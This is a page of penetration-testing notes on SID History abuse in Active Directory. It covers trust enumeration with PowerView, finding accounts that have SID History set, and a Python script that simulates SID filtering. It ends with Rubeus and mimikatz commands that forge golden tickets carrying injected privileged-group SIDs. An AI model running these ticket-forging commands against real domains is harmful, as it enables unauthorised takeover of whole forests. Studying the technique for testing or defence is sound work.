Otter's Notes
SID History

Last updated 11 months ago

SID History abuse is a technique used to escalate privileges in a parent-child trust configuration.

This attack abuses SID History, a legitimate account attribute (sIDHistory) that was designed to handle the migration of a user from one domain to another: to make sure the migrated user kept access to resources in the old domain, the user's old SID was added to the SID History attribute of the new account. When the user authenticates, the SIDs stored there are placed in the ExtraSids field of the ticket's PAC, where they are honoured exactly like real group memberships.

Forging a ticket whose PAC carries chosen Extra SIDs therefore allows users from the child domain to inherit permissions or group memberships from the parent domain; this is possible because SID Filtering is not enabled when dealing with domains from the same forest.

The different exploitation methods are documented below.

SID History Injection

SID History Injection (or SID Hijacking) refers to an attack that consists of injecting the SID of a highly privileged group or user from the target domain into the SID History of a low-privileged user account in the source domain, either by writing the sIDHistory attribute itself or, more commonly, by forging a ticket whose PAC contains that SID as an Extra SID.

If we're dealing with SID Hijacking in a cross-forest configuration we have to be aware that SID Filtering will filter out all SIDs with a Relative Identifier (RID) lower than 1000, i.e. the well-known built-in principals such as Domain Admins (RID 512) or Enterprise Admins (RID 519), as well as any SID that does not belong to a domain of the trusted forest. This security measure is usually circumvented by leveraging SIDs of the trusted forest with a RID equal to or higher than 1000, since such custom groups might still be associated with high privileges on the trusting side.

To start off, we can check whether SID History is enabled over the trust at all:

Import-Module .\PowerView.ps1
Get-DomainTrust -Domain otherdomain.com | Where-Object {$_.TargetName -eq "domain.com"} | Select TrustAttributes

If the output of this command includes the TREAT_AS_EXTERNAL flag, then SID History is enabled within that forest trust (this is the flag that netdom trust /enablesidhistory:yes sets). For a parent-child trust inside the same forest the check is moot, since no SID filtering is applied there.
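The following is an added example and not code from the original notes: a small Python model of the two checks described above, decoding a trust's trustAttributes bitmask to tell whether SID History is honoured over it, and simulating which Extra SIDs of a forged ticket survive SID filtering on the trusting side. The filtering rules are the simplified ones stated in this page (no filtering inside a forest; over a cross-forest trust with SID History enabled, only SIDs of the trusted forest with a RID of 1000 or higher pass), not a reimplementation of the KDC. The domain SIDs are the ones used in the Rubeus example further down; the three trust scenarios and their attribute values are constructed.

```python
"""
Added example (not part of the original notes): decode trustAttributes and
simulate SID filtering of Extra SIDs under the simplified rules the notes give.
"""
from __future__ import annotations
import re

# trustAttributes flag bits as defined in [MS-ADTS]
TRUST_ATTRIBUTES = {
    0x001: "NON_TRANSITIVE",
    0x002: "UPLEVEL_ONLY",
    0x004: "QUARANTINED_DOMAIN",
    0x008: "FOREST_TRANSITIVE",
    0x010: "CROSS_ORGANIZATION",
    0x020: "WITHIN_FOREST",
    0x040: "TREAT_AS_EXTERNAL",
    0x080: "USES_RC4_ENCRYPTION",
    0x200: "CROSS_ORGANIZATION_NO_TGT_DELEGATION",
    0x400: "PIM_TRUST",
    0x800: "CROSS_ORGANIZATION_ENABLE_TGT_DELEGATION",
}

# NT domain SID: S-1-5-21-<three sub-authorities>[-<RID>]
SID_RE = re.compile(r"^S-1-5-21-\d+-\d+-\d+(?:-(\d+))?$")


def decode_trust_attributes(value: int) -> list[str]:
    """Return the flag names set in a trustAttributes value, lowest bit first."""
    return [name for bit, name in sorted(TRUST_ATTRIBUTES.items()) if value & bit]


def sid_history_allowed(value: int) -> bool:
    """Does the trusting side honour sIDHistory / Extra SIDs coming over this trust?

    WITHIN_FOREST (parent-child, tree-root): always, no SID filtering at all.
    FOREST_TRANSITIVE: only when TREAT_AS_EXTERNAL is set (netdom /enablesidhistory:yes).
    Otherwise (external trust): only when QUARANTINED_DOMAIN is clear; this last rule is
    netdom's /quarantine semantics and is not discussed in the notes.
    """
    flags = set(decode_trust_attributes(value))
    if "WITHIN_FOREST" in flags:
        return True
    if "FOREST_TRANSITIVE" in flags:
        return "TREAT_AS_EXTERNAL" in flags
    return "QUARANTINED_DOMAIN" not in flags


def split_sid(sid: str) -> tuple[str, int | None]:
    """Split a domain SID into (domain SID, RID); RID is None for a bare domain SID."""
    m = SID_RE.match(sid)
    if m is None:
        raise ValueError(f"not a domain SID: {sid}")
    if m.group(1) is None:
        return sid, None
    return sid.rsplit("-", 1)[0], int(m.group(1))


def filter_extra_sids(extra_sids: list[str], trusted_forest_domains: list[str],
                      trust_attributes: int) -> list[str]:
    """Simulate what the trusting DC keeps of a ticket's Extra SIDs.

    trusted_forest_domains: domain SIDs of the forest the ticket was issued in
    (the one the attacker controls). Simplified model, see module docstring.
    """
    if not sid_history_allowed(trust_attributes):
        return []                      # every Extra SID is dropped
    if "WITHIN_FOREST" in decode_trust_attributes(trust_attributes):
        return list(extra_sids)        # intra-forest: nothing is filtered
    kept = []
    for sid in extra_sids:
        domain, rid = split_sid(sid)
        # forest trust with SID History: same-forest SIDs with RID >= 1000 only
        if domain in trusted_forest_domains and rid is not None and rid >= 1000:
            kept.append(sid)
    return kept


# Domain SIDs taken from the notes' Rubeus example
CHILD_DOMAIN_SID = "S-1-5-21-2432454459-173448545-3375717855"
PARENT_DOMAIN_SID = "S-1-5-21-186204973-2882451676-2899969076"
ENTERPRISE_ADMINS = PARENT_DOMAIN_SID + "-519"    # well-known RID, below 1000
CUSTOM_GROUP = PARENT_DOMAIN_SID + "-2602"        # the RID the notes inject

WITHIN_FOREST = 0x20                   # constructed: parent-child trust
FOREST_WITH_SIDHISTORY = 0x08 | 0x40   # constructed: forest trust after /enablesidhistory:yes
FOREST_DEFAULT = 0x08                  # constructed: forest trust with default filtering


def demo() -> dict[str, list[str]]:
    """Three constructed scenarios for the same set of injected Extra SIDs."""
    injected = [ENTERPRISE_ADMINS, CUSTOM_GROUP, CHILD_DOMAIN_SID + "-1105"]
    return {
        # child -> parent inside one forest: every injected SID passes
        "intra_forest": filter_extra_sids(injected, [PARENT_DOMAIN_SID, CHILD_DOMAIN_SID], WITHIN_FOREST),
        # cross-forest, SID History on, PARENT_DOMAIN_SID is the trusted forest:
        # RID 519 and the foreign CHILD SID are dropped, RID 2602 survives
        "forest_sidhistory": filter_extra_sids(injected, [PARENT_DOMAIN_SID], FOREST_WITH_SIDHISTORY),
        # cross-forest with defaults: everything is filtered
        "forest_default": filter_extra_sids(injected, [PARENT_DOMAIN_SID], FOREST_DEFAULT),
    }


if __name__ == "__main__":
    for name, kept in demo().items():
        print(f"{name:18s} -> {kept}")
```

Feed the TrustAttributes integer returned by Get-DomainTrust (or Get-ADTrust) to decode_trust_attributes to see the flags by name, and use filter_extra_sids to decide beforehand which /sids value in a golden ticket can actually survive the trust you are crossing.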

To enumerate users that already have a SID History set, we can use the Get-ADUser cmdlet from the ActiveDirectory module:

Get-ADUser -Filter "SIDHistory -Like '*'" -Properties SIDHistory

If we find some interesting user we can reset their password and use a sacrificial PowerShell process to request a TGT for them.

Looking at the user's permissions, we can either decide to abuse existing permissions or execute an ExtraSIDs attack, i.e. forge a ticket for a user of the current domain that carries the SID of a privileged group from the target domain in its Extra SIDs. In order to perform the attack we need:

  • The KRBTGT hash of the current (child) domain

  • The SID of the current (child) domain

  • The name of a target user in the current domain (any domain user)

  • The FQDN of the current domain

  • The SID of the high-privileged group in the target domain (typically Enterprise Admins, RID 519, in the forest root)

All this information can be retrieved with different tools: BloodHound, secretsdump, lookupsid, Mimikatz, ...

Once we have fetched all the data we need, we can request a golden ticket that carries the extra SID. In the examples below /sid is the SID of the current (child) domain and /sids is the SID of the privileged group in the target (parent) domain:

.\Rubeus.exe golden /rc4:<KRBTGT HASH> /domain:domain.com /sid:S-1-5-21-2432454459-173448545-3375717855 /sids:S-1-5-21-186204973-2882451676-2899969076-2602 /user:otter /ptt
mimikatz # kerberos::golden /user:otter /domain:domain.com  /sid:S-1-5-21-2432454459-173448545-3375717855 /sids:S-1-5-21-186204973-2882451676-2899969076-2602 /krbtgt:<KRBTGT HASH> /ptt